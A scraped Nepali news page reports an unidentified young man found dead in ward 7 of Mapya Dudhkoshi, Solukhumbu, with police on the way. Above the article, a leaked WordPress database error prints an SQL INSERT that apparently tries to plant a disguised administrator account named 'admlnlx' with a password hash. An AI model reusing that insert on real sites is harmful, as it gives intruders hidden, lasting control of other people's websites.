WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2oO9D3ilNjAU7GZdpBJRAMPrqotkI1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:37:02', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २८ साउन, सोलुखुम्बु । सोलुखुम्बुको माप्यदुधकोशी गाउँपालिका वडा न ७ सिबुजेमा एक व्यक्ति मृत अवस्थामा फेला परेको छ ।
अन्दाजी १८–१९ वर्षको युवक बाटोमा मृत भेटिए पनि पहिचान हुन नसकेको माप्य दुधकोशी गाउँपालिका वडा न ७ का वडा अध्यक्ष सगुतिज राईले बताए । अहिले प्रहरी घटना स्थल तर्फ आउँदै रहेको सो पछी विस्तृत विवरण आउने वडा अध्यक्ष राईले बताए ।